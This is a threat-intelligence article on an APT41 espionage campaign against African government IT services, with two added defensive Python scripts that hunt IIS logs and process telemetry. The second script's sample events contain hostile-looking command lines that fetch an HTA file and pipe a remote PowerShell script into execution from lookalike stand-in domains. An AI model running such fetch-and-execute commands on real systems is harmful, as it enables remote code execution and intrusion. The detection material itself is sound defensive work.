New Cyber Espionage Campaign Targets African IT Infrastructure
A recently uncovered cyber espionage operation attributed to the China-linked group APT41 has targeted government IT services in Africa. Researchers at Kaspersky reported finding indicators attributable to the group and noted a shift in focus toward a region that had previously seen little activity from this actor.
APT41: A Prolific Cyber Threat
APT41, known for its extensive hacking activity, has historically targeted a wide range of industries, including telecommunications, energy, education, and healthcare, across more than thirty countries. This campaign marks an expansion into Africa, a continent that experts say had previously seen minimal intrusions from the group. Trend Micro had separately observed an uptick in APT41 activity against the continent since late 2022, so the trend is not isolated to a single vendor's telemetry.
Initial Investigation and Malicious Activities
Kaspersky's investigation began with suspicious activity on several workstations belonging to an unnamed organization's IT services. The workstations were checking whether a command-and-control (C2) server was reachable; that server turned out to be an unmonitored host that had already been compromised. From it, the attackers executed commands on other systems using a series of lateral movement tools.
During the intrusion the attackers harvested credentials for privileged accounts to escalate their access, and then deployed Cobalt Strike, a commercial adversary-emulation framework widely abused for command and control, via DLL side-loading: the beacon was packaged in a malicious DLL that a legitimate, signed executable loads in place of the library it expects, so the implant runs under a trusted process name.
Sophisticated Malware Techniques
The malicious DLLs in this campaign also check which language packs are installed on the host and run only if certain packs, such as Japanese and Korean, among others, are absent. This is a regional guard: it keeps the implant from executing on machines in locales the operators want to avoid, and it doubles as a basic anti-analysis check against sandboxes configured with those languages.
A defining characteristic of this operation is the use of a compromised SharePoint server as the C2 channel. Commands issued through this server are executed by a C#-based trojan uploaded to the victim machines, so the attackers combine conventional malware deployment with abuse of a trusted service whose HTTP traffic blends in with normal collaboration activity.
Advanced Command Execution and Payload Delivery
To carry out command execution, the attackers distributed files named "agents.exe" and "agentx.exe" over SMB; these executables communicate with the compromised SharePoint server. The trojan's main function is to run commands received from a web shell named CommandHandler.aspx installed on that server. Routing tasking through a server that already serves legitimate HTTP requests lets the operators keep a low profile, since the beacon traffic never leaves the environment as an obviously foreign connection.
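The web-shell-as-C2 pattern above leaves two traces in the SharePoint front end's own IIS logs: an .aspx page the product never shipped, and a client hitting it on a timer. The following hunt script is an added example written for this page, not code from Kaspersky or from the campaign; the web shell name CommandHandler.aspx is taken from the reporting, while its path under /_layouts/15/, the client addresses, the timestamps, and the baseline page inventory are all constructed for illustration.

```python
"""Hunt an IIS log for web-shell style C2 on a SharePoint front end."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed IIS W3C lines (not real data). The web shell name CommandHandler.aspx
# comes from the reporting; its path and every address here are assumptions.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip cs(User-Agent) sc-status
2024-05-01 09:00:00 GET /_layouts/15/start.aspx 10.10.4.21 Mozilla/5.0+Edge 200
2024-05-01 09:00:05 POST /_layouts/15/CommandHandler.aspx 10.10.7.33 Mozilla/5.0 200
2024-05-01 09:01:05 POST /_layouts/15/CommandHandler.aspx 10.10.7.33 Mozilla/5.0 200
2024-05-01 09:02:00 GET /sites/hr/Shared%20Documents/Forms/AllItems.aspx 10.10.4.21 Mozilla/5.0+Edge 200
2024-05-01 09:02:06 POST /_layouts/15/CommandHandler.aspx 10.10.7.33 Mozilla/5.0 200
2024-05-01 09:03:05 POST /_layouts/15/CommandHandler.aspx 10.10.7.33 Mozilla/5.0 200
2024-05-01 09:04:05 POST /_layouts/15/CommandHandler.aspx 10.10.7.33 Mozilla/5.0 200
2024-05-01 09:20:00 GET /_layouts/15/start.aspx 10.10.4.22 Mozilla/5.0+Edge 200
2024-05-01 09:41:00 GET /_layouts/15/start.aspx 10.10.4.21 Mozilla/5.0+Edge 200
"""

LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<method>\S+) (?P<uri>\S+) "
    r"(?P<ip>\S+) (?P<ua>\S+) (?P<status>\d{3})$"
)

# Assumed inventory of .aspx pages the farm is known to ship (illustrative, not a real baseline).
BASELINE_ASPX = {"start.aspx", "allitems.aspx", "default.aspx", "viewlsts.aspx"}


def parse_iis(text):
    """Parse W3C-format lines into dicts with a datetime under 'ts'; skip directives."""
    events = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if m:
            e = m.groupdict()
            e["ts"] = datetime.strptime(f"{e['date']} {e['time']}", "%Y-%m-%d %H:%M:%S")
            events.append(e)
    return events


def unknown_aspx(events):
    """URIs ending in .aspx whose page name is not in the baseline: a dropped
    web shell is, by definition, a page the product never shipped."""
    hits = set()
    for e in events:
        name = e["uri"].rsplit("/", 1)[-1].lower()
        if name.endswith(".aspx") and name not in BASELINE_ASPX:
            hits.add(e["uri"])
    return hits


def periodic_clients(events, min_hits=4, min_interval=30.0, max_cv=0.2):
    """(client, uri) pairs whose requests arrive at near-constant intervals.
    An implant polls its tasking endpoint on a timer; a person clicking through
    a document library does not. Returns {pair: mean gap in seconds}."""
    by_pair = defaultdict(list)
    for e in events:
        by_pair[(e["ip"], e["uri"])].append(e["ts"])
    flagged = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mu = mean(gaps)
        # Coefficient of variation: little spread around a steady interval means a timer.
        if mu >= min_interval and pstdev(gaps) / mu <= max_cv:
            flagged[pair] = mu
    return flagged


def hunt_iis(text):
    events = parse_iis(text)
    return {"unknown_aspx": unknown_aspx(events), "periodic": periodic_clients(events)}


if __name__ == "__main__":
    for key, value in hunt_iis(SAMPLE_LOG).items():
        print(key, value)
```

Run against the constructed log, the unknown-page check surfaces CommandHandler.aspx, and the interval check flags 10.10.7.33 polling it roughly every 60 seconds while the two interactive users, who visit stock pages at irregular times, produce nothing. In production the baseline should be generated from a clean install plus the farm's approved customizations, and the beaconing thresholds tuned against a week of real traffic before alerting.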
Malicious Payloads and Data Exfiltration
Once a foothold was established, follow-up activity included cmd.exe commands that pulled a malicious HTML Application (HTA) file from an external server under a domain chosen to resemble GitHub. The file contained embedded JavaScript that opens a reverse shell to the attackers. The exact nature of the final payload remains unclear, but the reverse shell gives the operators interactive access to the host for later use.
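Two signals in that step are cheap to detect from process-creation telemetry: a command shell launching mshta.exe (or another living-off-the-land binary) with a URL on its command line, and a URL whose host name carries a brand token such as "github" under a domain the brand does not own. The following is an added example for this page, not code from Kaspersky or from the campaign; the events, host names (github.example, github.com.cdn-update.example), paths and the allowlist of legitimate GitHub domains are constructed for illustration, and the registered-domain logic is deliberately naive.

```python
"""Flag process launches that fetch remote content, and lookalike domains in their URLs."""
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"'<>]+")

# Binaries that will fetch and run or parse remote content when handed a URL.
REMOTE_CAPABLE = {"mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe",
                  "powershell.exe", "pwsh.exe", "bitsadmin.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Brand token to watch for and the registered domains that legitimately carry it
# (assumed allowlist for illustration; extend per environment).
BRAND = "github"
LEGIT_DOMAINS = {"github.com", "githubusercontent.com", "github.io", "githubassets.com"}

# Constructed Sysmon-style process-creation events (not real telemetry);
# every host name and path below is an assumption.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta.exe "https://github.example/r/update.hta"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": 'chrome.exe https://github.com/org/repo'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe C:\Users\ops\wizard.hta'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -c "iwr https://github.com.cdn-update.example/p.ps1 | iex"'},
    {"parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": 'certutil.exe -urlcache -f https://raw.githubusercontent.com/org/repo/main/c.txt c.txt'},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def registered_domain(host):
    """Naive eTLD+1 (last two labels). Production code should use the Public Suffix List."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def is_lookalike(host):
    """The host mentions the brand somewhere, but the domain actually registered is not
    one of the brand's own. Catches both github.example and github.com.evil.example."""
    return BRAND in host.lower() and registered_domain(host) not in LEGIT_DOMAINS


def assess(event):
    """Return the findings for one process-creation event, in a fixed order."""
    image, parent = basename(event["image"]), basename(event["parent"])
    urls = URL_RE.findall(event["cmdline"])
    findings = []
    if urls and image in REMOTE_CAPABLE:
        findings.append(f"lolbin_remote_fetch:{image}")
    if image == "mshta.exe" and parent in SHELLS:
        findings.append("shell_spawned_mshta")
    for u in urls:
        host = urlparse(u).hostname or ""
        if is_lookalike(host):
            findings.append(f"lookalike_domain:{host}")
    return findings


def hunt_processes(events):
    """Map event index to findings, keeping only events that triggered something."""
    return {i: f for i, e in enumerate(events) if (f := assess(e))}


if __name__ == "__main__":
    for i, f in hunt_processes(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["cmdline"], "->", f)
```

The browser hitting github.com produces no finding, certutil pulling from raw.githubusercontent.com produces only the generic LOLBin finding, and the two events that fetch from lookalike hosts accumulate several findings at once, which is what an analyst wants to triage first. The brand check should be extended to every brand the organisation relies on, and the last-two-labels heuristic replaced with a Public Suffix List lookup before it is used on real telemetry, since multi-label suffixes such as co.uk would otherwise be mishandled.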
Credential Harvesting and Information Theft
The attackers used several utilities to collect sensitive data and exfiltrated it through the compromised SharePoint server. These included:
- Pillager: A modified credential stealer that extracts data from browsers, databases, and administrative tools.
- Checkout: A tool specifically targeting saved credit card information and downloaded file details across numerous web browsers.
- RawCopy: A utility that copies files Windows keeps locked, such as registry hives, by reading them directly from the raw NTFS volume.
- Mimikatz: A well-known tool for dumping account credentials.
The Threat Landscape
Kaspersky's analysis stresses that APT41 mixes custom-built and publicly available tooling, with frameworks such as Cobalt Strike appearing at several stages of the attack. The operators adapt their techniques to the infrastructure they find, including repurposing the victim's own servers as C2 relays, which makes detection and containment harder.
The campaign illustrates the difficulty of defending against espionage actors whose tooling overlaps with legitimate penetration testing software: presence of the tool alone is not a reliable signal, and defenders must instead watch for how and where it is used. As APT41 continues to refine its tactics, monitoring of internal servers that are normally treated as trusted, together with robust detection and response processes, becomes increasingly important.